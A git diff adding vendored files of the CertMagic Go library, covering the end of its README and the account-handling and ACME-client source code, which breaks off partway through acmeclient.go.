The easiest way to change the storage being used is to set `certmagic.DefaultStorage` to a value that satisfies the [Storage interface](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Storage). Keep in mind that a valid `Storage` must be able to implement some operations atomically in order to provide locking and synchronization.
|
||||
|
||||
If you write a Storage implementation, please add it to the [project wiki](https://github.com/caddyserver/certmagic/wiki/Storage-Implementations) so people can find it!
|
||||
|
||||
|
||||
## Cache
|
||||
|
||||
All of the certificates in use are de-duplicated and cached in memory for optimal performance at handshake-time. This cache must be backed by persistent storage as described above.
|
||||
|
||||
Most applications will not need to interact with certificate caches directly. Usually, the closest you will come is to set the package-wide `certmagic.DefaultStorage` variable (before attempting to create any Configs). However, if your use case requires using different storage facilities for different Configs (that's highly unlikely and NOT recommended! Even Caddy doesn't get that crazy), you will need to call `certmagic.NewCache()` and pass in the storage you want to use, then get new `Config` structs with `certmagic.NewWithCache()` and pass in the cache.
|
||||
|
||||
Again, if you're needing to do this, you've probably over-complicated your application design.
|
||||
|
||||
|
||||
## FAQ
|
||||
|
||||
### Can I use some of my own certificates while using CertMagic?
|
||||
|
||||
Yes, just call the relevant method on the `Config` to add your own certificate to the cache:
|
||||
|
||||
- [`CacheUnmanagedCertificatePEMBytes()`](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Config.CacheUnmanagedCertificatePEMBytes)
|
||||
- [`CacheUnmanagedCertificatePEMFile()`](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Config.CacheUnmanagedCertificatePEMFile)
|
||||
- [`CacheUnmanagedTLSCertificate()`](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Config.CacheUnmanagedTLSCertificate)
|
||||
|
||||
Keep in mind that unmanaged certificates are (obviously) not renewed for you, so you'll have to replace them when you do. However, OCSP stapling is performed even for unmanaged certificates that qualify.
|
||||
|
||||
|
||||
### Does CertMagic obtain SAN certificates?
|
||||
|
||||
Technically all certificates these days are SAN certificates because CommonName is deprecated. But if you're asking whether CertMagic issues and manages certificates with multiple SANs, the answer is no. But it does support serving them, if you provide your own.
|
||||
|
||||
|
||||
### How can I listen on ports 80 and 443? Do I have to run as root?
|
||||
|
||||
On Linux, you can use `setcap` to grant your binary the permission to bind low ports:
|
||||
|
||||
```bash
|
||||
$ sudo setcap cap_net_bind_service=+ep /path/to/your/binary
|
||||
```
|
||||
|
||||
and then you will not need to run with root privileges.
|
||||
|
||||
|
||||
## Contributing
|
||||
|
||||
We welcome your contributions! Please see our **[contributing guidelines](https://github.com/caddyserver/certmagic/blob/master/.github/CONTRIBUTING.md)** for instructions.
|
||||
|
||||
|
||||
## Project History
|
||||
|
||||
CertMagic is the core of Caddy's advanced TLS automation code, extracted into a library. The underlying ACME client implementation is [ACMEz](https://github.com/mholt/acmez). CertMagic's code was originally a central part of Caddy even before Let's Encrypt entered public beta in 2015.
|
||||
|
||||
In the years since then, Caddy's TLS automation techniques have been widely adopted, tried and tested in production, and served millions of sites and secured trillions of connections.
|
||||
|
||||
Now, CertMagic is _the actual library used by Caddy_. It's incredibly powerful and feature-rich, but also easy to use for simple Go programs: one line of code can enable fully-automated HTTPS applications with HTTP->HTTPS redirects.
|
||||
|
||||
Caddy is known for its robust HTTPS+ACME features. When ACME certificate authorities have had outages, in some cases Caddy was the only major client that didn't experience any downtime. Caddy can weather OCSP outages lasting days, or CA outages lasting weeks, without taking your sites offline.
|
||||
|
||||
Caddy was also the first to sport "on-demand" issuance technology, which obtains certificates during the first TLS handshake for an allowed SNI name.
|
||||
|
||||
Consequently, CertMagic brings all these (and more) features and capabilities right into your own Go programs.
|
||||
|
||||
You can [watch a 2016 dotGo talk](https://www.dotconferences.com/2016/10/matthew-holt-go-with-acme) by the author of this library about using ACME to automate certificate management in Go programs:
|
||||
|
||||
[](https://www.dotconferences.com/2016/10/matthew-holt-go-with-acme)
|
||||
|
||||
|
||||
|
||||
## Credits and License
|
||||
|
||||
CertMagic is a project by [Matthew Holt](https://twitter.com/mholt6), who is the author; and various contributors, who are credited in the commit history of either CertMagic or Caddy.
|
||||
|
||||
CertMagic is licensed under Apache 2.0, an open source license. For convenience, its main points are summarized as follows (but this is no replacement for the actual license text):
|
||||
|
||||
- The author owns the copyright to this code
|
||||
- Use, distribute, and modify the software freely
|
||||
- Private and internal use is allowed
|
||||
- License text and copyright notices must stay intact and be included with distributions
|
||||
- Any and all changes to the code must be documented
|
410
vendor/github.com/caddyserver/certmagic/account.go
generated
vendored
Normal file
410
vendor/github.com/caddyserver/certmagic/account.go
generated
vendored
Normal file
@ -0,0 +1,410 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"bytes"
|
||||
"context"
|
||||
"crypto/ecdsa"
|
||||
"crypto/elliptic"
|
||||
"crypto/rand"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"io/fs"
|
||||
"os"
|
||||
"path"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"github.com/mholt/acmez/acme"
|
||||
)
|
||||
|
||||
// getAccount either loads or creates a new account, depending on if
|
||||
// an account can be found in storage for the given CA + email combo.
|
||||
func (am *ACMEIssuer) getAccount(ctx context.Context, ca, email string) (acme.Account, error) {
|
||||
acct, err := am.loadAccount(ctx, ca, email)
|
||||
if errors.Is(err, fs.ErrNotExist) {
|
||||
return am.newAccount(email)
|
||||
}
|
||||
return acct, err
|
||||
}
|
||||
|
||||
// loadAccount loads an account from storage, but does not create a new one.
|
||||
func (am *ACMEIssuer) loadAccount(ctx context.Context, ca, email string) (acme.Account, error) {
|
||||
regBytes, err := am.config.Storage.Load(ctx, am.storageKeyUserReg(ca, email))
|
||||
if err != nil {
|
||||
return acme.Account{}, err
|
||||
}
|
||||
keyBytes, err := am.config.Storage.Load(ctx, am.storageKeyUserPrivateKey(ca, email))
|
||||
if err != nil {
|
||||
return acme.Account{}, err
|
||||
}
|
||||
|
||||
var acct acme.Account
|
||||
err = json.Unmarshal(regBytes, &acct)
|
||||
if err != nil {
|
||||
return acct, err
|
||||
}
|
||||
acct.PrivateKey, err = PEMDecodePrivateKey(keyBytes)
|
||||
if err != nil {
|
||||
return acct, fmt.Errorf("could not decode account's private key: %v", err)
|
||||
}
|
||||
|
||||
return acct, nil
|
||||
}
|
||||
|
||||
// newAccount generates a new private key for a new ACME account, but
|
||||
// it does not register or save the account.
|
||||
func (*ACMEIssuer) newAccount(email string) (acme.Account, error) {
|
||||
var acct acme.Account
|
||||
if email != "" {
|
||||
acct.Contact = []string{"mailto:" + email} // TODO: should we abstract the contact scheme?
|
||||
}
|
||||
privateKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
||||
if err != nil {
|
||||
return acct, fmt.Errorf("generating private key: %v", err)
|
||||
}
|
||||
acct.PrivateKey = privateKey
|
||||
return acct, nil
|
||||
}
|
||||
|
||||
// GetAccount first tries loading the account with the associated private key from storage.
|
||||
// If it does not exist in storage, it will be retrieved from the ACME server and added to storage.
|
||||
// The account must already exist; it does not create a new account.
|
||||
func (am *ACMEIssuer) GetAccount(ctx context.Context, privateKeyPEM []byte) (acme.Account, error) {
|
||||
account, err := am.loadAccountByKey(ctx, privateKeyPEM)
|
||||
if errors.Is(err, fs.ErrNotExist) {
|
||||
account, err = am.lookUpAccount(ctx, privateKeyPEM)
|
||||
}
|
||||
return account, err
|
||||
}
|
||||
|
||||
// loadAccountByKey loads the account with the given private key from storage, if it exists.
|
||||
// If it does not exist, an error of type fs.ErrNotExist is returned. This is not very efficient
|
||||
// for lots of accounts.
|
||||
func (am *ACMEIssuer) loadAccountByKey(ctx context.Context, privateKeyPEM []byte) (acme.Account, error) {
|
||||
accountList, err := am.config.Storage.List(ctx, am.storageKeyUsersPrefix(am.CA), false)
|
||||
if err != nil {
|
||||
return acme.Account{}, err
|
||||
}
|
||||
for _, accountFolderKey := range accountList {
|
||||
email := path.Base(accountFolderKey)
|
||||
keyBytes, err := am.config.Storage.Load(ctx, am.storageKeyUserPrivateKey(am.CA, email))
|
||||
if err != nil {
|
||||
return acme.Account{}, err
|
||||
}
|
||||
if bytes.Equal(bytes.TrimSpace(keyBytes), bytes.TrimSpace(privateKeyPEM)) {
|
||||
return am.loadAccount(ctx, am.CA, email)
|
||||
}
|
||||
}
|
||||
return acme.Account{}, fs.ErrNotExist
|
||||
}
|
||||
|
||||
// lookUpAccount looks up the account associated with privateKeyPEM from the ACME server.
|
||||
// If the account is found by the server, it will be saved to storage and returned.
|
||||
func (am *ACMEIssuer) lookUpAccount(ctx context.Context, privateKeyPEM []byte) (acme.Account, error) {
|
||||
client, err := am.newACMEClient(false)
|
||||
if err != nil {
|
||||
return acme.Account{}, fmt.Errorf("creating ACME client: %v", err)
|
||||
}
|
||||
|
||||
privateKey, err := PEMDecodePrivateKey([]byte(privateKeyPEM))
|
||||
if err != nil {
|
||||
return acme.Account{}, fmt.Errorf("decoding private key: %v", err)
|
||||
}
|
||||
|
||||
// look up the account
|
||||
account := acme.Account{PrivateKey: privateKey}
|
||||
account, err = client.GetAccount(ctx, account)
|
||||
if err != nil {
|
||||
return acme.Account{}, fmt.Errorf("looking up account with server: %v", err)
|
||||
}
|
||||
|
||||
// save the account details to storage
|
||||
err = am.saveAccount(ctx, client.Directory, account)
|
||||
if err != nil {
|
||||
return account, fmt.Errorf("could not save account to storage: %v", err)
|
||||
}
|
||||
|
||||
return account, nil
|
||||
}
|
||||
|
||||
// saveAccount persists an ACME account's info and private key to storage.
|
||||
// It does NOT register the account via ACME or prompt the user.
|
||||
func (am *ACMEIssuer) saveAccount(ctx context.Context, ca string, account acme.Account) error {
|
||||
regBytes, err := json.MarshalIndent(account, "", "\t")
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
keyBytes, err := PEMEncodePrivateKey(account.PrivateKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
// extract primary contact (email), without scheme (e.g. "mailto:")
|
||||
primaryContact := getPrimaryContact(account)
|
||||
all := []keyValue{
|
||||
{
|
||||
key: am.storageKeyUserReg(ca, primaryContact),
|
||||
value: regBytes,
|
||||
},
|
||||
{
|
||||
key: am.storageKeyUserPrivateKey(ca, primaryContact),
|
||||
value: keyBytes,
|
||||
},
|
||||
}
|
||||
return storeTx(ctx, am.config.Storage, all)
|
||||
}
|
||||
|
||||
// getEmail does everything it can to obtain an email address
|
||||
// from the user within the scope of memory and storage to use
|
||||
// for ACME TLS. If it cannot get an email address, it does nothing
|
||||
// (If user is prompted, it will warn the user of
|
||||
// the consequences of an empty email.) This function MAY prompt
|
||||
// the user for input. If allowPrompts is false, the user
|
||||
// will NOT be prompted and an empty email may be returned.
|
||||
func (am *ACMEIssuer) getEmail(ctx context.Context, allowPrompts bool) error {
|
||||
leEmail := am.Email
|
||||
|
||||
// First try package default email, or a discovered email address
|
||||
if leEmail == "" {
|
||||
leEmail = DefaultACME.Email
|
||||
}
|
||||
if leEmail == "" {
|
||||
discoveredEmailMu.Lock()
|
||||
leEmail = discoveredEmail
|
||||
discoveredEmailMu.Unlock()
|
||||
}
|
||||
|
||||
// Then try to get most recent user email from storage
|
||||
var gotRecentEmail bool
|
||||
if leEmail == "" {
|
||||
leEmail, gotRecentEmail = am.mostRecentAccountEmail(ctx, am.CA)
|
||||
}
|
||||
if !gotRecentEmail && leEmail == "" && allowPrompts {
|
||||
// Looks like there is no email address readily available,
|
||||
// so we will have to ask the user if we can.
|
||||
var err error
|
||||
leEmail, err = am.promptUserForEmail()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// User might have just signified their agreement
|
||||
am.Agreed = DefaultACME.Agreed
|
||||
}
|
||||
|
||||
// save the email for later and ensure it is consistent
|
||||
// for repeated use; then update cfg with the email
|
||||
leEmail = strings.TrimSpace(strings.ToLower(leEmail))
|
||||
discoveredEmailMu.Lock()
|
||||
if discoveredEmail == "" {
|
||||
discoveredEmail = leEmail
|
||||
}
|
||||
discoveredEmailMu.Unlock()
|
||||
am.Email = leEmail
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// promptUserForEmail prompts the user for an email address
|
||||
// and returns the email address they entered (which could
|
||||
// be the empty string). If no error is returned, then Agreed
|
||||
// will also be set to true, since continuing through the
|
||||
// prompt signifies agreement.
|
||||
func (am *ACMEIssuer) promptUserForEmail() (string, error) {
|
||||
// prompt the user for an email address and terms agreement
|
||||
reader := bufio.NewReader(stdin)
|
||||
am.promptUserAgreement("")
|
||||
fmt.Println("Please enter your email address to signify agreement and to be notified")
|
||||
fmt.Println("in case of issues. You can leave it blank, but we don't recommend it.")
|
||||
fmt.Print(" Email address: ")
|
||||
leEmail, err := reader.ReadString('\n')
|
||||
if err != nil && err != io.EOF {
|
||||
return "", fmt.Errorf("reading email address: %v", err)
|
||||
}
|
||||
leEmail = strings.TrimSpace(leEmail)
|
||||
DefaultACME.Agreed = true
|
||||
return leEmail, nil
|
||||
}
|
||||
|
||||
// promptUserAgreement simply outputs the standard user
|
||||
// agreement prompt with the given agreement URL.
|
||||
// It outputs a newline after the message.
|
||||
func (am *ACMEIssuer) promptUserAgreement(agreementURL string) {
|
||||
userAgreementPrompt := `Your sites will be served over HTTPS automatically using an automated CA.
|
||||
By continuing, you agree to the CA's terms of service`
|
||||
if agreementURL == "" {
|
||||
fmt.Printf("\n\n%s.\n", userAgreementPrompt)
|
||||
return
|
||||
}
|
||||
fmt.Printf("\n\n%s at:\n %s\n", userAgreementPrompt, agreementURL)
|
||||
}
|
||||
|
||||
// askUserAgreement prompts the user to agree to the agreement
|
||||
// at the given agreement URL via stdin. It returns whether the
|
||||
// user agreed or not.
|
||||
func (am *ACMEIssuer) askUserAgreement(agreementURL string) bool {
|
||||
am.promptUserAgreement(agreementURL)
|
||||
fmt.Print("Do you agree to the terms? (y/n): ")
|
||||
|
||||
reader := bufio.NewReader(stdin)
|
||||
answer, err := reader.ReadString('\n')
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
answer = strings.ToLower(strings.TrimSpace(answer))
|
||||
|
||||
return answer == "y" || answer == "yes"
|
||||
}
|
||||
|
||||
func storageKeyACMECAPrefix(issuerKey string) string {
|
||||
return path.Join(prefixACME, StorageKeys.Safe(issuerKey))
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyCAPrefix(caURL string) string {
|
||||
return storageKeyACMECAPrefix(am.issuerKey(caURL))
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyUsersPrefix(caURL string) string {
|
||||
return path.Join(am.storageKeyCAPrefix(caURL), "users")
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyUserPrefix(caURL, email string) string {
|
||||
if email == "" {
|
||||
email = emptyEmail
|
||||
}
|
||||
return path.Join(am.storageKeyUsersPrefix(caURL), StorageKeys.Safe(email))
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyUserReg(caURL, email string) string {
|
||||
return am.storageSafeUserKey(caURL, email, "registration", ".json")
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyUserPrivateKey(caURL, email string) string {
|
||||
return am.storageSafeUserKey(caURL, email, "private", ".key")
|
||||
}
|
||||
|
||||
// storageSafeUserKey returns a key for the given email, with the default
|
||||
// filename, and the filename ending in the given extension.
|
||||
func (am *ACMEIssuer) storageSafeUserKey(ca, email, defaultFilename, extension string) string {
|
||||
if email == "" {
|
||||
email = emptyEmail
|
||||
}
|
||||
email = strings.ToLower(email)
|
||||
filename := am.emailUsername(email)
|
||||
if filename == "" {
|
||||
filename = defaultFilename
|
||||
}
|
||||
filename = StorageKeys.Safe(filename)
|
||||
return path.Join(am.storageKeyUserPrefix(ca, email), filename+extension)
|
||||
}
|
||||
|
||||
// emailUsername returns the username portion of an email address (part before
|
||||
// '@') or the original input if it can't find the "@" symbol.
|
||||
func (*ACMEIssuer) emailUsername(email string) string {
|
||||
at := strings.Index(email, "@")
|
||||
if at == -1 {
|
||||
return email
|
||||
} else if at == 0 {
|
||||
return email[1:]
|
||||
}
|
||||
return email[:at]
|
||||
}
|
||||
|
||||
// mostRecentAccountEmail finds the most recently-written account file
|
||||
// in storage. Since this is part of a complex sequence to get a user
|
||||
// account, errors here are discarded to simplify code flow in
|
||||
// the caller, and errors are not important here anyway.
|
||||
func (am *ACMEIssuer) mostRecentAccountEmail(ctx context.Context, caURL string) (string, bool) {
|
||||
accountList, err := am.config.Storage.List(ctx, am.storageKeyUsersPrefix(caURL), false)
|
||||
if err != nil || len(accountList) == 0 {
|
||||
return "", false
|
||||
}
|
||||
|
||||
// get all the key infos ahead of sorting, because
|
||||
// we might filter some out
|
||||
stats := make(map[string]KeyInfo)
|
||||
for i := 0; i < len(accountList); i++ {
|
||||
u := accountList[i]
|
||||
keyInfo, err := am.config.Storage.Stat(ctx, u)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if keyInfo.IsTerminal {
|
||||
// I found a bug when macOS created a .DS_Store file in
|
||||
// the users folder, and CertMagic tried to use that as
|
||||
// the user email because it was newer than the other one
|
||||
// which existed... sure, this isn't a perfect fix but
|
||||
// frankly one's OS shouldn't mess with the data folder
|
||||
// in the first place.
|
||||
accountList = append(accountList[:i], accountList[i+1:]...)
|
||||
i--
|
||||
continue
|
||||
}
|
||||
stats[u] = keyInfo
|
||||
}
|
||||
|
||||
sort.Slice(accountList, func(i, j int) bool {
|
||||
iInfo := stats[accountList[i]]
|
||||
jInfo := stats[accountList[j]]
|
||||
return jInfo.Modified.Before(iInfo.Modified)
|
||||
})
|
||||
|
||||
if len(accountList) == 0 {
|
||||
return "", false
|
||||
}
|
||||
|
||||
account, err := am.getAccount(ctx, caURL, path.Base(accountList[0]))
|
||||
if err != nil {
|
||||
return "", false
|
||||
}
|
||||
|
||||
return getPrimaryContact(account), true
|
||||
}
|
||||
|
||||
// getPrimaryContact returns the first contact on the account (if any)
|
||||
// without the scheme. (I guess we assume an email address.)
|
||||
func getPrimaryContact(account acme.Account) string {
|
||||
// TODO: should this be abstracted with some lower-level helper?
|
||||
var primaryContact string
|
||||
if len(account.Contact) > 0 {
|
||||
primaryContact = account.Contact[0]
|
||||
if idx := strings.Index(primaryContact, ":"); idx >= 0 {
|
||||
primaryContact = primaryContact[idx+1:]
|
||||
}
|
||||
}
|
||||
return primaryContact
|
||||
}
|
||||
|
||||
// When an email address is not explicitly specified, we can remember
|
||||
// the last one we discovered to avoid having to ask again later.
|
||||
// (We used to store this in DefaultACME.Email but it was racey; see #127)
|
||||
var (
|
||||
discoveredEmail string
|
||||
discoveredEmailMu sync.Mutex
|
||||
)
|
||||
|
||||
// stdin is used to read the user's input if prompted;
|
||||
// this is changed by tests during tests.
|
||||
var stdin = io.ReadWriter(os.Stdin)
|
||||
|
||||
// The name of the folder for accounts where the email
|
||||
// address was not provided; default 'username' if you will,
|
||||
// but only for local/storage use, not with the CA.
|
||||
const emptyEmail = "default"
|
384
vendor/github.com/caddyserver/certmagic/acmeclient.go
generated
vendored
Normal file
384
vendor/github.com/caddyserver/certmagic/acmeclient.go
generated
vendored
Normal file
@ -0,0 +1,384 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"fmt"
|
||||
weakrand "math/rand"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strconv"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/mholt/acmez"
|
||||
"github.com/mholt/acmez/acme"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
func init() {
|
||||
weakrand.Seed(time.Now().UnixNano())
|
||||
}
|
||||
|
||||
// acmeClient holds state necessary to perform ACME operations
|
||||
// for certificate management with an ACME account. Call
|
||||
// ACMEIssuer.newACMEClientWithAccount() to get a valid one.
|
||||
type acmeClient struct {
|
||||
iss *ACMEIssuer
|
||||
acmeClient *acmez.Client
|
||||
account acme.Account
|
||||
}
|
||||
|
||||
// newACMEClientWithAccount creates an ACME client ready to use with an account, including
|
||||
// loading one from storage or registering a new account with the CA if necessary. If
|
||||
// useTestCA is true, am.TestCA will be used if set; otherwise, the primary CA will be used.
|
||||
func (iss *ACMEIssuer) newACMEClientWithAccount(ctx context.Context, useTestCA, interactive bool) (*acmeClient, error) {
|
||||
// first, get underlying ACME client
|
||||
client, err := iss.newACMEClient(useTestCA)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// look up or create the ACME account
|
||||
var account acme.Account
|
||||
if iss.AccountKeyPEM != "" {
|
||||
account, err = iss.GetAccount(ctx, []byte(iss.AccountKeyPEM))
|
||||
} else {
|
||||
account, err = iss.getAccount(ctx, client.Directory, iss.Email)
|
||||
}
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("getting ACME account: %v", err)
|
||||
}
|
||||
|
||||
// register account if it is new
|
||||
if account.Status == "" {
|
||||
if iss.NewAccountFunc != nil {
|
||||
account, err = iss.NewAccountFunc(ctx, iss, account)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("account pre-registration callback: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// agree to terms
|
||||
if interactive {
|
||||
if !iss.Agreed {
|
||||
var termsURL string
|
||||
dir, err := client.GetDirectory(ctx)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("getting directory: %w", err)
|
||||
}
|
||||
if dir.Meta != nil {
|
||||
termsURL = dir.Meta.TermsOfService
|
||||
}
|
||||
if termsURL != "" {
|
||||
iss.Agreed = iss.askUserAgreement(termsURL)
|
||||
if !iss.Agreed {
|
||||
return nil, fmt.Errorf("user must agree to CA terms")
|
||||
}
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// can't prompt a user who isn't there; they should
|
||||
// have reviewed the terms beforehand
|
||||
iss.Agreed = true
|
||||
}
|
||||
account.TermsOfServiceAgreed = iss.Agreed
|
||||
|
||||
// associate account with external binding, if configured
|
||||
if iss.ExternalAccount != nil {
|
||||
err := account.SetExternalAccountBinding(ctx, client.Client, *iss.ExternalAccount)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
|
||||
// create account
|
||||
account, err = client.NewAccount(ctx, account)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("registering account %v with server: %w", account.Contact, err)
|
||||
}
|
||||
|
||||
// persist the account to storage
|
||||
err = iss.saveAccount(ctx, client.Directory, account)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("could not save account %v: %v", account.Contact, err)
|
||||
}
|
||||
}
|
||||
|
||||
c := &acmeClient{
|
||||
iss: iss,
|
||||
acmeClient: client,
|
||||
account: account,
|
||||
}
|
||||
|
||||
return c, nil
|
||||
}
|
||||
|
||||
// newACMEClient creates a new underlying ACME client using the settings in am,
|
||||
// independent of any particular ACME account. If useTestCA is true, am.TestCA
|
||||
// will be used if it is set; otherwise, the primary CA will be used.
|
||||
func (iss *ACMEIssuer) newACMEClient(useTestCA bool) (*acmez.Client, error) {
|
||||
// ensure defaults are filled in
|
||||
var caURL string
|
||||
if useTestCA {
|
||||
caURL = iss.TestCA
|
||||
}
|
||||
if caURL == "" {
|
||||
caURL = iss.CA
|
||||
}
|
||||
if caURL == "" {
|
||||
caURL = DefaultACME.CA
|
||||
}
|
||||
certObtainTimeout := iss.CertObtainTimeout
|
||||
if certObtainTimeout == 0 {
|
||||
certObtainTimeout = DefaultACME.CertObtainTimeout
|
||||
}
|
||||
|
||||
// ensure endpoint is secure (assume HTTPS if scheme is missing)
|
||||
if !strings.Contains(caURL, "://") {
|
||||
caURL = "https://" + caURL
|
||||
}
|
||||
u, err := url.Parse(caURL)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if u.Scheme != "https" && !isLoopback(u.Host) && !isInternal(u.Host) {
|
||||
return nil, fmt.Errorf("%s: insecure CA URL (HTTPS required)", caURL)
|
||||
}
|
||||
|
||||
// set up the dialers and resolver for the ACME client's HTTP client
|
||||
dialer := &net.Dialer{
|
||||
Timeout: 30 * time.Second,
|
||||
KeepAlive: 2 * time.Minute,
|
||||
}
|
||||
if iss.Resolver != "" {
|
||||
dialer.Resolver = &net.Resolver{
|
||||
PreferGo: true,
|
||||
Dial: func(ctx context.Context, network, _ string) (net.Conn, error) {
|
||||
return (&net.Dialer{
|
||||
Timeout: 15 * time.Second,
|
||||
}).DialContext(ctx, network, iss.Resolver)
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// TODO: we could potentially reuse the HTTP transport and client
|
||||
hc := iss.httpClient // TODO: is this racey?
|
||||
if iss.httpClient == nil {
|
||||
transport := &http.Transport{
|
||||
Proxy: http.ProxyFromEnvironment,
|
||||
DialContext: dialer.DialContext,
|
||||
TLSHandshakeTimeout: 30 * time.Second, // increase to 30s requested in #175
|
||||
ResponseHeaderTimeout: 30 * time.Second, // increase to 30s requested in #175
|
||||
ExpectContinueTimeout: 2 * time.Second,
|
||||
ForceAttemptHTTP2: true,
|
||||
}
|
||||
if iss.TrustedRoots != nil {
|
||||
transport.TLSClientConfig = &tls.Config{
|
||||
RootCAs: iss.TrustedRoots,
|
||||
}
|
||||
}
|
||||
|
||||
hc = &http.Client{
|
||||
Transport: transport,
|
||||
Timeout: HTTPTimeout,
|
||||
}
|
||||
|
||||
iss.httpClient = hc
|
||||
}
|
||||
|
||||
client := &acmez.Client{
|
||||
Client: &acme.Client{
|
||||
Directory: caURL,
|
||||
PollTimeout: certObtainTimeout,
|
||||
UserAgent: buildUAString(),
|
||||
HTTPClient: hc,
|
||||
},
|
||||
ChallengeSolvers: make(map[string]acmez.Solver),
|
||||
}
|
||||
if iss.Logger != nil {
|
||||
l := iss.Logger.Named("acme_client")
|
||||
client.Client.Logger, client.Logger = l, l
|
||||
}
|
||||
|
||||
// configure challenges (most of the time, DNS challenge is
|
||||
// exclusive of other ones because it is usually only used
|
||||
// in situations where the default challenges would fail)
|
||||
if iss.DNS01Solver == nil {
|
||||
// enable HTTP-01 challenge
|
||||
if !iss.DisableHTTPChallenge {
|
||||
useHTTPPort := HTTPChallengePort
|
||||
if HTTPPort > 0 && HTTPPort != HTTPChallengePort {
|
||||
useHTTPPort = HTTPPort
|
||||
}
|
||||
if iss.AltHTTPPort > 0 {
|
||||
useHTTPPort = iss.AltHTTPPort
|
||||
}
|
||||
client.ChallengeSolvers[acme.ChallengeTypeHTTP01] = distributedSolver{
|
||||
storage: iss.config.Storage,
|
||||
storageKeyIssuerPrefix: iss.storageKeyCAPrefix(client.Directory),
|
||||
solver: &httpSolver{
|
||||
acmeIssuer: iss,
|
||||
address: net.JoinHostPort(iss.ListenHost, strconv.Itoa(useHTTPPort)),
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// enable TLS-ALPN-01 challenge
|
||||
if !iss.DisableTLSALPNChallenge {
|
||||
useTLSALPNPort := TLSALPNChallengePort
|
||||
if HTTPSPort > 0 && HTTPSPort != TLSALPNChallengePort {
|
||||
useTLSALPNPort = HTTPSPort
|
||||
}
|
||||
if iss.AltTLSALPNPort > 0 {
|
||||
useTLSALPNPort = iss.AltTLSALPNPort
|
||||
}
|
||||
client.ChallengeSolvers[acme.ChallengeTypeTLSALPN01] = distributedSolver{
|
||||
storage: iss.config.Storage,
|
||||
storageKeyIssuerPrefix: iss.storageKeyCAPrefix(client.Directory),
|
||||
solver: &tlsALPNSolver{
|
||||
config: iss.config,
|
||||
address: net.JoinHostPort(iss.ListenHost, strconv.Itoa(useTLSALPNPort)),
|
||||
},
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// use DNS challenge exclusively
|
||||
client.ChallengeSolvers[acme.ChallengeTypeDNS01] = iss.DNS01Solver
|
||||
}
|
||||
|
||||
// wrap solvers in our wrapper so that we can keep track of challenge
|
||||
// info: this is useful for solving challenges globally as a process;
|
||||
// for example, usually there is only one process that can solve the
|
||||
// HTTP and TLS-ALPN challenges, and only one server in that process
|
||||
// that can bind the necessary port(s), so if a server listening on
|
||||
// a different port needed a certificate, it would have to know about
|
||||
// the other server listening on that port, and somehow convey its
|
||||
// challenge info or share its config, but this isn't always feasible;
|
||||
// what the wrapper does is it accesses a global challenge memory so
|
||||
// that unrelated servers in this process can all solve each others'
|
||||
// challenges without having to know about each other - Caddy's admin
|
||||
// endpoint uses this functionality since it and the HTTP/TLS modules
|
||||
// do not know about each other
|
||||
// (doing this here in a separate loop ensures that even if we expose
|
||||
// solver config to users later, we will even wrap their own solvers)
|
||||
for name, solver := range client.ChallengeSolvers {
|
||||
client.ChallengeSolvers[name] = solverWrapper{solver}
|
||||
}
|
||||
|
